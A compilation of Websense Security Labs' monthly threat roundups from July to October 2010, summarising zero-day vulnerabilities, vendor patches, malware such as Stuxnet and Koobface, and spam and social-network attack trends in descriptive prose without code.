Towards the end of the month, a cross-platform Facebook worm that mimics some Koobface qualities heated up the information security sphere.  Facebook users received messages with links to a video. This worm, known as Boonana, lured users into installing a Java applet when the link enclosed with the message was clicked.  When users allowed the installation, other malicious components downloaded.  A closer look at the Boonana code sparked further interest since it contained codes indicating that it was targeting Mac OS X.

A new zero-day vulnerability (CVE-2010-3654) was discovered in Adobe Flash Player at the end of October. The vulnerability caused a crash and potentially allowed an attacker to take control of the affected system. Here are some details. A PDF file with an embedded flash file object exploited this vulnerability. And another zero-day vulnerability (CVE-2010-3653) was found in Adobe Shockwave Player. Here, a remote attacker could exploit the vulnerability to execute arbitary code or cause a denial of service. This was done via a director movie with a crafted rcsl chunk. The exploit code is published here. Also a new mega patch for Adobe PDF Reader was released, and 23 security holes have been fixed.

Mozilla released 9 bulletins in the middle of October, including 5 critical updates. The Noble Peace Prize's Web site was compromised, 0 day vulnerability (CVE-2010-3765) in Firefox was exploited to drop a Belmoo trojan on unsuspecting visitors' systems, and Mozilla patched the vulnerability very quickly.

Google released a security update for its Chrome browser to fix 11 vulnerabilities.

Oracle delivered a mega patch for Jave SE and Java for business. 29 security vulnerabilities were fixed. And the patch for Java on Mac OS was released here.

According to RealNetworks, 7 vulnerabilities in RealPlayer were fixed here.

Microsoft 

Microsoft sent out an astounding 16 bulletins meant to patch 49 vulnerabilities in the Windows operating system, Internet Explorer, .NET framework and Microsoft Office on October's Black Tuesday.  Patches for vulnerabilities that could allow remote code executions in Internet Explorer (MS10-071), Media Player Network Sharing (MS10-075), Embedded OpenType Font Engine (MS10-076) and .NET Framework (MS10-077) are deemed to be the most critical fixes and should be treated with high priority this month. 

Hello Threatseeker. You've got mail!

This month, Websense Security Labs saw spammers returning to some of their trickiest treats to fool email recipients.  Sorry, I couldn't resist the Halloween reference since it's October.  We saw that spammers were stuffing their messages with legitimate content to try and evade spam filters.  With one of the many campaigns we saw this month, the messages were leading to an unfamiliar target called World Pharmacy.  These messages were interesting because they were abusing legitimate site reputations much in the same way malicious attackers usually do.  The links in the messages were leading to URLs injected into legitimate sites which were meant to simply redirect to these World Pharmacy spam sites.  In an extension to this campaign, we also saw that spammers were attempting to take advantage of the ultimate reputation by using Google Translation services to redirect to software sites. 

Security trends

A PDF vulnerability was found on BlackBerry Enterprise Server that the BlackBerry Attachment Service runs on. This security hole discovered in the PDF distiller could allow a malicious individual to cause buffer overflow errors, leading to a Denial of Service (DoS) condition or possibly arbitrary code execution.This occurred when users opened PDFs on their Blackberries.

Microsoft has added Zeus disinfection instructions onto its malicious software removal tool (MSRT). It nuked Zeus (also called Zbot) 281,491 times from 274,873 computers in one week. MSRT scans Windows computers for infections by specific, prevalent malicious software. This tool is updated and released on the second Tuesday of each month, and Zbot is the latest addition to MSRT’s ever-growing list of malware.

A vulnerability for iPhone was posted to a MacRumors forum by a New Zealand iPhone user who figured out a sequence of key taps that rendered the passcode useless. It's a trivial way to bypass the four-digit passcode lock on fully patched iPhone (iOS 4.1) devices.

Security researchers found that the first version of the Koobface malware targeting Mac OS X users was spreading via links in messages on social networking sites such as Facebook, MySpace, and Twitter. The malicious Web sites attempted to trick Mac OS X users into running the Java applet  to open a video file.

The past few months have been very busy with zero-day flaws affecting popular products. In total, those vulnerabilities accounted for 108 non-patch days - that's 88.5% of vulnerable time in 4 months.

Murofet malware is similar to Conficker in that it generates thousands of domains daily that it then contacts for updates.

This month's round up contributors

• Ulysses Wang
• Lei Li
• Mary Grace Timcang
• Chris Astacio
• Jay Liew

Month of September

Major Hits

Stuxnet was the major story last month. After the presentations at Virus Bulletin 2010 [1,2] Stuxnet has gotten even more attention. CVE-2010-2883, a 0-day in Adobe Reader, was another major story.

A malicious injection targeting Song Lyrics put Google users at risk, thanks to Google Instant. Finally, Google Code was found to be hosting malicious Web content, specifically the Ultimate BlackHat Tool Kit.

Web 2 dot uh oh

"Links lead to more Links" - you are just 2 clicks away from being infected. Use of Link Analysis to find objectionable or malicious content and ACE (Advanced Classification Engine) technology gives us in-depth insight into security threats on the social Web and helps protect our users. Over 40 percent of Facebook posts contain a URL and 10 percent of those are either spam or malicious. Take a look at some tips for avoiding the potential dangers of user generated content in our Websense Insight: Link Analysis blog. Visit Defensio.com for the only social media threat detection application that protects social media sites and Facebook pages from spam or profanity.

The highlight in Web 2.0 this month was a "OnMouseOver" flaw on twitter.com. The flaw, caused by XSS (cross-site scripting), delivered pop-ups to users when they moused over specially-crafted tweets. The tweets contained JavaScript code that ran the OnMouseOver event, which enabled the code to run without requiring a mouse click. The issue could potentially have been used by malware authors to spread malicious tweets that redirected users to malicious Web sites. The flaw was patched and is no longer exploitable.

Browser and friends

A number of security flaws on some of the most-used media players - Apple's iTunes and QuickTime, and Real Network's RealPlayer, hit the September headlines.  While RealPlayer and iTunes released patches for known vulnerabilities, QuickTime faced a classic drive-by 0-day that may lead to arbitrary code execution by visiting malicious Web sites or images. Websense® ACE (Advanced Classification Engine) identified and protected our customers against this attack at least a month before this news broke out.

Google Chrome marked its 2nd birthday by delivering patches on 15 known vulnerabilities. Firefox also released patches for 15 vulnerabilities, including fixes for the DLL load hijacking issue. Apple released patches for 3 security holes in its Safari browser, 2 of which affects Safari and iTunes' open-source rendering engine Webkit.

A security update for Adobe Flash Player was released mid-September for a 0-day that allowed the attacker to gain control of affected systems. CVE-2010-2884 affects Flash Player version 10.1.82.76 and earlier, Adobe Reader 9.3.4 and earlier, and Adobe Acrobat 9.3.4 and earlier.

Microsoft

Major DLL load hijacking issues crossed over from the end of August to the beginning of last month affecting not only Microsoft, but other popular vendors as well.  Microsoft then released a one-click 'Fix It' tool a day after the delivery of the CWDIllegalInDllSearch utility, which secures the system by rejecting unsafe DLL loading behavior. Both tools work hand-in-hand to protect users against the latest DLL load hijacking issues that ultimately lead to remote code execution attacks.

10 bulletins meant to fix at least 11 known vulnerabilities in Windows and MS Office Suite were dispatched in this month's Patch Tuesday, 7 of which are for remote code execution. Critical patches are for Print Spooler Service (MS10-061), MPEG-4 Codec (MS10-062), Unicode Scripts Processor (MS10-063), and Microsoft Outlook (MS10-064).

Hello Threatseeker. You've got mail!

The start of the month saw the use of an old trick involving an .scr file masquerading as a .pdf file using the "Here You Have" malicious emails.  It is interesting that there is no need to re-invent the wheel when you can simply recycle methods and processes, in this case the use of an old worm being spread using different means.  Surprisingly, this escaped most AV engines as verified on VirusTotal. 

Jumping on the band wagon of using any means to get users' attention and to propagate attacks, this month saw further blended attacks employing everyday tools we have grown accustomed to, such as Skype-themed malicious emails and Facebook password reset emails leading users to rogue AV downloads.  

There is no shortage of the use of social networking sites or related emails to spread malware. However, the intriguing aspect of these attacks is that they are blended; what happens in the background, unknown to the user, is pertinent. One might think they have been redirected to a rogue AV site and that is all, but they could have potentially kicked off a chain reaction with redirects to an exploit site where an exploit kit or other damaging content would be downloaded to the user's machine.

Later in the month, there was the use of tragic news to spread malicious content, as in the case of the death of Daniel Covington. The blended attack in this case did not only take users to a Rogue AV download page but also downloaded the Phoenix exploit kit. 

This month teaches us two things in our opinion, "Spammers will use any means to propagate their malware" and "We need to pay special attention to blended attacks"

Security Trends

The Route to Malware shows that just 2 clicks can get to malicious code on an infected Web site. Websense researchers looked at how most Internet users were only 2 clicks away from malicious content in one of three ways: from top sites, poisoned search results, and malicious links.
 
Fake warning pages start displaying on a user's browser. The trick was used by a new rogue criminal as a social engineering scheme in order to  trick users into downloading and installing the rogue.  The fake warning pages are so similar to the real thing that it can trick even highly-trained eyes.
 
Security vulnerabilities prevent companies from adopting Web 2.0 in their business practices. McAfee released their Global Web 2.0 Report in September. As they said, the top perceived threats of Web 2.0 usage by employees are malicious software (35 percent were concerned about it), viruses (15 percent), overexposure of information (11 percent), and spyware (10 percent).

This month's roundup contributors:

• Saeed Abu-Nimeh
• Artem Gololobov
• Mary Grace Timcang
• Amon Sanniez
• Lei Li
• Jay Liew

Month of August 2010

Major hits

Mass compromises & infections
Network Solutions, one of the oldest domain registrars in the world, was found to be serving up a malicious widget on its customers' Web sites. All sites that opted to display a "Small Business Success Index" widget were infecting their visitors. This includes sites not hosted by Network Solutions itself, such as Google Blogger accounts that installed the widget. Armorize has a more detailed analysis here, and pegged the number of compromised sites at a minimum of half a million (source: Google) or five million (source: Yahoo). It was also discovered that this widget is served up as part of the standard domain parking page for new domains registered.

Web hosting companies Media Template and Rackspace also found themselves compromised and accidentally serving up malicious code to their visitors. 

DLL Hijacking
Another tactic to infect users, dubbed "DLL hijacking", grabbed headlines this month. Basically, when you fire up an app in Windows (e.g. Microsoft PowerPoint), more often than not big apps search a series of locations for "helper" libraries to assist with the job. Knowing that the app will search for other libraries to execute, a bad guy can place a malicious binary in the location the app is searching in an attempt to trick the app into thinking that the malicious file is the correct library. This vulnerability has been added to Metasploit; check out this video to see it in action.

iPhone Web drive-by exploit
Usually when we talk about drive-by exploits, it goes without saying that we're referring to something bad that is to be avoided. But what about people who intentionally try to get exploited by a drive-by, whether they understand it in those terms or not?!? Yes, we're talking about the much hyped JailbreakMe Web site for Apple's iOS. Basically, all you need to do is open your browser from your iOS device (iPad, iPhone, etc.) and visit the Web site. With just one click (or "swipe" on the "touch" interface) and the Web site jailbreaks your device (using an exploit). The broader food for thought here is that whereas this Web site prompts for your permission to execute an exploit on your device to do things the owners consent to, the fact that this is technically possible (our research) in the first place opens the door to malicious Web sites that don't have to prompt you for permission to do malicious things on your device that you don't consent to.

In other news, watch out for malicious fake YouTube pages and malicious links that show up in Bing search results, both of which can lead to rogue or fake anti-virus software.

Web 2 dot uh oh

This month saw a huge increase in the number of abused and fake accounts being used for spam propagation such as in the case of the fake Friendster.com accounts that seem to have happened over the course of a few days (blogged about here).  

The threat of Web spam seems more real than ever as the world of Web 2.0 and the use of social networking sites becomes ever more popular.  Another way to look at it is that "it is really here to stay".

Browser and friends

At the Black Hat USA 2010 conference, researcher Charlie Miller presented an exploitable vulnerability in Adobe's PDF Reader. Adobe delivered an out of cycle patch in the middle of August to patch the CVE-2010-2862 vulnerability and another critical vulnerability. Adobe also released two security updates this month, one was for Adobe Flash Player, which fixed six critical vulnerabilities, and the other was for Shockwave Player.

A security update for QuickTime was released in early August, to plug a hole that allowed arbitrary code execution. At the end of August, a 0-day vulnerability in Apple's QuickTime player was discovered. The flaw affected the latest version of QuickTime (7.67.75.0), an alert was published here.

Google released Google Chrome 5.0.375.127 with patches for 9 security holes. Google paid $10,011 to award those who reported the bugs.

Opera released Opera 10.61 update which fixed three vulnerabilities.

Microsoft

Microsoft had to send out an out-of-band update to patch the LNK vulnerability that was discovered last month. One week after that, Microsoft had a record "patch Tuesday" that included 14 bulletins patching 34 vulnerabilities, eight of them were critical. The patches affected Windows, Microsoft Office, Internet Explorer, SQL and Silverlight.

However, Microsoft is not alone in the game as Adobe had to patch 10 critical vulnerabilities in Flash Player, Flash Media Server, and ColdFusion.

Hello ThreatSeeker. You've got mail!

This month in the email space saw some of the usual suspects come around again.  There were spoofed Microsoft emails that tried to get users to download a spam bot executable.  The attackers tried to make recipients of these emails believe that they needed to patch their systems for a dangerous 0-day attack.  We also saw a large spike in malicious spam that used various subjects which looked personalized as a social engineering trick to entice recipients to open malicious attachments in emails. 

For attackers, every day is tax day as they continued their tax themed social engineering tricks.  This campaign of emails contained variants that told of under reported income warnings or higher tax bracket notifications.  These messages also either contained a link to a malicious executable or an attachment. 

Perhaps the most interesting trend this month was the use of many brands with which to spam people.  This technique is nothing new, but how it was being used was a bit new.  With these messages, we saw the use of malicious links that were meant to download and install Rogue AV software on victim computers.  This is a bit new as most attacks involving Rogue AV used Blackhat SEO as their attack vector.

Security Trends

60GB of accounting data for social networking sites, bank accounts, credit card numbers, and intercepted emails were stolen by a mini ZeuS botnet dubbed Mumba. Thirty three percent of the infected users are based in the U.S, followed by 17 percent in Germany, and 7 percent in Spain.

The first SMS Trojan for Android OS has been detected as Trojan-SMS.AndroidOS.FakePlayer.a spread in Russia. For now, the Trojan only causes losses for Russian users, and as far as we can tell, it’s currently not being spread via the Android Marketplace.

A kind of Interesting PHP injection has been found by researchers.  The script uses the User-Agent field as the deobfuscation key and the injected PHP script contains multiple eval() calls of which every one uses a different deobfuscation key.

The United States edition of the second annual International Barometer published by Panda Security showed that 46 percent of U.S. small- and medium-sized businesses (SMBs)  have fallen victim to cybercrime, up two percent from last year’s survey.  The group surveyed nearly 10,000 SMBs around the globe and more than 1,500 in the United States.

Innocent companies with good reputations are targeted by identity thieves looking for valid certificates to provide malware authors. There are many possible scams purposely make it very difficult to verify that the CA coming from a company is genuine. This should give us all serious concern about the trustworthiness of code signing in general.
 
This month's roundup contributors:

• Saeed Abu-Nimeh
• Lei Li
• Ulysses Wang
• Chris Astacio
• Amon Sanniez
• Matthew Mors
• Jay Liew

Month of July
This month the world saw the Microsoft Windows LNK shortcut flaw bring a smile to black hat hackers running Stuxnet, Chymine, Vobfus, Sality and Zeus, as they quickly updated their malware to leverage the vulnerability. In addition, we'll talk about banking Trojans piggy-backing on social-networking sites, the YouTube XSS vulnerability, malicious browser add-ons, brand-jacking, and more.

Also this month, the Websense Security Lab researchers presented at Black Hat Las Vegas and Hack In The Box in Amsterdam.

Major Hits

Ever wonder where your search engine stands relative to others based on malicious links they serve up in their search results? A two-month study by Barracuda Labs provides these estimates (be careful clicking those links!). Total malware by search engine:

• Google: 69%
• Yahoo: 18%
• Bing: 12%
• Twitter: 1%

The Windows LNK shortcut flaw (CVE-2010-2568) made a huge splash this month, a problem exacerbated by a computer worm dubbed Stuxnet that uses this flaw as one of the worm's propagation methods. Stuxnet targets Siemens SCADA systems, used to control production at industrial plants.

Strictly speaking, the LNK files themselves were correctly formatted (as opposed to a file crafted to exploit a buffer overflow) and they were legitimate .lnk files, except that they were allowed to link to (and run) executable files located elsewhere -- an ugly design flaw. The bad guys simply took the opportunity to make shortcuts to malware, and sent these shortcuts around to victims. The shortcuts could be activated without actually clicking on them. Using Windows Internet Explorer, merely browsing to the folder containing the malicious .lnk file triggered the bad stuff. Here is our technical analysis on the Microsoft LNK vulnerability.

Hot on the heels of Stuxnet, malware makers of Chymine, Vobfus, Sality, and Zeus updated their unwanted products to benefit from this vulnerability. Additional mitigation advice can be found here: US-CERT VU#940193

Web 2 dot uh oh

Last month in this section we mentioned that new ways to exploit social networks continue to surface. This month was more of the same. The RSA FraudAction Research Lab was among many to observe social sites being used to operate a banking Trojan virus. Once the Trojan infects a user's computer, the virus accesses a specific social profile, Google Group, or even a Twitter feed, all set up by the controller of the virus. From these sites, the virus, trained to parse text, can receive instructions embedded in posts, feeds, etc. This sophisticated exploitation of social sites bypasses the cost and maintenance of independent servers dedicated to doing the same thing. Using these free sites, communication with the Trojan can be done for no cost with little risk. It is up to the site to remove these malicious throw away accounts.

The other notable exploit of Web 2.0 functionality in July was YouTube's XSS vulnerability.  The visual effects of this vulnerability were seen by many users when only the top few comments of a post were loaded, along with a script comment regarded mostly as spam. Fortunately this was the extent to which the vulnerability was exploited before Google patched the YouTube service. Potentially this could have been used to force the browser to execute embedded malicious script code disguised in the YouTube page.

Browser and friends

Mozilla has blacklisted a third-party add-on called "Mozilla Sniffer". The add-on submits the login form of any website, with the password field, to a remote location. The add-on has been downloaded about 1800 times. Those who installed it are advised to change their password in case of attack. Mozilla also released two security updates this month; 15 vulnerabilities have been patched.

It has been disclosed by researcher Jeremiah Grossman that the "autofill" feature in Apple Safari has a security vulnerability. The autofill feature can be hacked to steal data from the computer's address book. Apple provided a quick response; a patch was released a few days later. In all, 15 vulnerabilities were fixed this month, including the autofill problem.

Google released a security update for Chrome. Five bugs were fixed in the patch.

The good news from Adobe is that Adobe Reader is going to add Protected Mode in the next version. Protected Mode is a sandboxing technology based on Microsoft's Practical Windows Sandboxing technique. It is similar to the Google Chrome sandbox and Microsoft Office 2010 Protected Viewing Mode. All operations required by Adobe Reader to display the PDF file to the user are run in a very restricted manner inside a confined environment. More good news is that Adobe will join Microsoft Active Protections Program (MAPP), in which vulnerability information is shared to security software providers in advance.

Microsoft

Aside from the major LNK vulnerability brouhaha mentioned above in the Major Hits section, Microsoft patched a vulnerability in Windows Help and Support Center (MS10-042), Canonical Display Driver (MS10-043), MS Office Access ActiveX Control (MS10-044), and MS Office Outlook (MS10-045). The Windows Help and Support Center  zero day (MS10-042) saw at least 25,000 attacks as confirmed by Microsoft, largely in Russia and Europe.

Hello Threatseeker. You've got mail!

This month there was a lot of follow up on the previous month's email threats.  In addition, there was no shortage or end to the abuse of social networking sites such as Facebook and hi5.  The more interesting attacks within the email space were focused on "brand-jacking" where Gumblar seem to have made a come back impersonating Amazon.com.  The aim of the campaign was to trick unsuspecting users to visit a client-side exploit serving URL.

Other attacks include but are not limited to the influx of Youtube themed spam requesting users to confirm their email address, the fake ImageShack Registration emails, and Welcome to My Opera account activation.

Security Trends

A low-cost, home-brewed GSM hacking device, developed by researcher Chris Paget, mimics more expensive devices already in use by intelligence and law enforcement agencies – called IMSI catchers – that can capture phone ID data and content.

According to Secunia’s recently released report, between 2005 and 2010 Apple Inc. had the most reported security vulnerabilities.

Some motherboards in 4 models of Dell PowerEdge servers were shipped to customers with malware code on the embedded server management firmware. A Dell representative confirmed the issue on Dell’s community forum.

A fake technical support phone call was used to spread malware. The attackers in this scheme cheated targeted users by calling them and helping them to install malware, remote desktop applications etc.

The Secunia Half Year Report 2010  asserts that a typical end-user PC with 50 installed programs had 3.5 times more vulnerabilities in the 24 third-party programs than in the 26 Microsoft programs.

Thanks to this month's roundup contributors:

* Lei Li

* Douglas Libby

* Amon Sanniez

* Ulysses Wang

* Jay Liew